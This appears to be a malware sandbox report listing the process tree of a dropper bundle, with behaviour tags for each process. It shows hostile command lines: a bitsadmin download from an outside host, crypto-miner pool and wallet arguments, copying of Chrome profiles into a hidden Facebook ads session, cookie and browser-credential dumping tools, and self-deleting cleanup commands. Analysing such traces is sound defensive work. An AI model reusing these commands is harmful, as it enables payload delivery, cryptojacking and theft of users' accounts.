C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5524 /prefetch:811⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dowwonzm.qjb\KiffApp2.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\dowwonzm.qjb\KiffApp2.exeC:\Users\Admin\AppData\Local\Temp\dowwonzm.qjb\KiffApp2.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3pwh5fc.uml\y1.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\l3pwh5fc.uml\y1.exeC:\Users\Admin\AppData\Local\Temp\l3pwh5fc.uml\y1.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qedgotxg.hvl\YDDWTFTMJU.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\qedgotxg.hvl\YDDWTFTMJU.exeC:\Users\Admin\AppData\Local\Temp\qedgotxg.hvl\YDDWTFTMJU.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4si5txbd.0dv\ABCbrowser.exe /VERYSILENT & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\4si5txbd.0dv\ABCbrowser.exeC:\Users\Admin\AppData\Local\Temp\4si5txbd.0dv\ABCbrowser.exe /VERYSILENT9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ol44ycjp.25a\toolspab1.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ol44ycjp.25a\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ol44ycjp.25a\toolspab1.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ol44ycjp.25a\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ol44ycjp.25a\toolspab1.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\miyqzfhx.0cg\inst.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\miyqzfhx.0cg\inst.exeC:\Users\Admin\AppData\Local\Temp\miyqzfhx.0cg\inst.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\eTjRbyJDwevVibLbXZ\ZLqkoMC:\Users\Admin\AppData\Local\Temp\eTjRbyJDwevVibLbXZ\ZLqkoM10⤵
-
C:\Users\Admin\AppData\Local\Temp\aEvYodoMRZrOXzRVeb\IXmSxkC:\Users\Admin\AppData\Local\Temp\aEvYodoMRZrOXzRVeb\IXmSxk11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wnnxwrxr.cuh\GcleanerWW.exe /mixone & exit8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3rn3aatr.x3l\SunLabsPlayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\3rn3aatr.x3l\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\3rn3aatr.x3l\SunLabsPlayer.exe /S9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn100D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jg52vjjb.vda\app.exe /8-2222 & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\jg52vjjb.vda\app.exeC:\Users\Admin\AppData\Local\Temp\jg52vjjb.vda\app.exe /8-22229⤵
-
C:\Users\Admin\AppData\Local\Temp\jg52vjjb.vda\app.exe"C:\Users\Admin\AppData\Local\Temp\jg52vjjb.vda\app.exe" /8-222210⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\filee.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\filee.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\9892.tmp.exe"C:\Users\Admin\AppData\Roaming\9892.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\9892.tmp.exe"C:\Users\Admin\AppData\Roaming\9892.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\AppData\Roaming\9AF5.tmp.exe"C:\Users\Admin\AppData\Roaming\9AF5.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w16830@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w18113 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\filee.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\jg6_6asg.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\kabo.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\IrecCH6.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\IrecCH6.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-63TFT.tmp\IrecCH6.tmp"C:\Users\Admin\AppData\Local\Temp\is-63TFT.tmp\IrecCH6.tmp" /SL5="$203FE,234767,151040,C:\Users\Admin\AppData\Local\Temp\RarSFX1\IrecCH6.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-3OPVB.tmp\player_record_48792.exe"C:\Users\Admin\AppData\Local\Temp\is-3OPVB.tmp\player_record_48792.exe" /S /UID=irecch66⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Media Player\QJTSBSPREI\irecord.exe"C:\Program Files\Windows Media Player\QJTSBSPREI\irecord.exe" /VERYSILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-QNFM1.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-QNFM1.tmp\irecord.tmp" /SL5="$20500,6139911,56832,C:\Program Files\Windows Media Player\QJTSBSPREI\irecord.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\recording\i-record.exe"C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\36-588ec-863-10583-78a3a664388ad\Dywazhibyfa.exe"C:\Users\Admin\AppData\Local\Temp\36-588ec-863-10583-78a3a664388ad\Dywazhibyfa.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\4d-4368e-aa4-c1fbd-a4ed795a84e9a\Maloxaeraeje.exe"C:\Users\Admin\AppData\Local\Temp\4d-4368e-aa4-c1fbd-a4ed795a84e9a\Maloxaeraeje.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4sqj0c3d.gqv\gaoou.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\4sqj0c3d.gqv\gaoou.exeC:\Users\Admin\AppData\Local\Temp\4sqj0c3d.gqv\gaoou.exe9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rub4hiz1.hxz\google-game.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\rub4hiz1.hxz\google-game.exeC:\Users\Admin\AppData\Local\Temp\rub4hiz1.hxz\google-game.exe9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install10⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pladm2gk.idx\md1_1eaf.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\pladm2gk.idx\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\pladm2gk.idx\md1_1eaf.exe9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nuyepqqs.kui\build.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\nuyepqqs.kui\build.exeC:\Users\Admin\AppData\Local\Temp\nuyepqqs.kui\build.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nuyepqqs.kui\build.exe" & del C:\ProgramData\*.dll & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nv0txl5d.iqq\askinstall36.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\nv0txl5d.iqq\askinstall36.exeC:\Users\Admin\AppData\Local\Temp\nv0txl5d.iqq\askinstall36.exe9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y10⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/10⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff87ef74f50,0x7ff87ef74f60,0x7ff87ef74f7011⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,8509755890910517632,1434930214279510127,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1632 /prefetch:811⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kp3kiqme.2ye\KiffApp2.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\kp3kiqme.2ye\KiffApp2.exeC:\Users\Admin\AppData\Local\Temp\kp3kiqme.2ye\KiffApp2.exe9⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aaf2kbtg.5yf\y1.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\aaf2kbtg.5yf\y1.exeC:\Users\Admin\AppData\Local\Temp\aaf2kbtg.5yf\y1.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\aaf2kbtg.5yf\y1.exe"10⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK11⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\liaui0oq.cw1\GZWRMDJALF.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\liaui0oq.cw1\GZWRMDJALF.exeC:\Users\Admin\AppData\Local\Temp\liaui0oq.cw1\GZWRMDJALF.exe9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b edge11⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b chrome11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b firefox11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ftki0ocx.2an\ABCbrowser.exe /VERYSILENT & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ftki0ocx.2an\ABCbrowser.exeC:\Users\Admin\AppData\Local\Temp\ftki0ocx.2an\ABCbrowser.exe /VERYSILENT9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kvukpg20.gnc\toolspab1.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\kvukpg20.gnc\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\kvukpg20.gnc\toolspab1.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\kvukpg20.gnc\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\kvukpg20.gnc\toolspab1.exe10⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aqx2wssi.xwl\inst.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\aqx2wssi.xwl\inst.exeC:\Users\Admin\AppData\Local\Temp\aqx2wssi.xwl\inst.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\DKjKfWelFENvessEpF\iWlalmC:\Users\Admin\AppData\Local\Temp\DKjKfWelFENvessEpF\iWlalm10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\hHrieadHtMBygylAhq\VNrgBLC:\Users\Admin\AppData\Local\Temp\hHrieadHtMBygylAhq\VNrgBL11⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgyo3rys.mhj\GcleanerWW.exe /mixone & exit8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pbfdcdl5.izh\SunLabsPlayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\pbfdcdl5.izh\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\pbfdcdl5.izh\SunLabsPlayer.exe /S9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pvnX6Az3B09XYRiZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p2zJ3SuXA9t5eWq2 -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 128010⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe /8-2222 & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exeC:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe /8-22229⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe" /8-222210⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\System32\CredentialUIBroker.exe"C:\Windows\System32\CredentialUIBroker.exe" AppContainer -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3e41⤵
-
C:\Users\Admin\AppData\Local\Temp\1109.exeC:\Users\Admin\AppData\Local\Temp\1109.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\18AC.exeC:\Users\Admin\AppData\Local\Temp\18AC.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\21B5.exeC:\Users\Admin\AppData\Local\Temp\21B5.exe1⤵
-
